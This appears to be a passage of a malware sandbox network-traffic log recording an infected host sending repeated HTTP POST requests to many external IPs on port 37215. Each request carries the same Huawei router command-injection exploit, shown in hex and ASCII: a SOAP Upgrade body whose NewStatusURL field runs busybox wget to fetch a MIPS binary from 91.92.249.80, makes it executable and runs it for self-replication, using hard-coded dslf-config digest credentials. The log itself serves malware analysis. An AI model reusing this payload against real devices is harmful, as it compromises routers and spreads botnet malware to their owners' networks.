                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1014192.168.2.2345974185.195.152.1637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.281733990 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1015192.168.2.2335814126.227.12.5937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.281793118 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1016192.168.2.2344830157.28.204.17437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.281841040 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1017192.168.2.2337214197.167.219.737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.284298897 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1018192.168.2.2346324197.8.126.2837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.285758972 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1019192.168.2.2351924157.25.202.10037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.285854101 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1020192.168.2.235143241.160.108.23737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.285871029 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1021192.168.2.235974041.71.71.4937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.285876036 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1022192.168.2.234805041.68.33.12737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.285890102 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1023192.168.2.234553687.108.132.9037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.285895109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
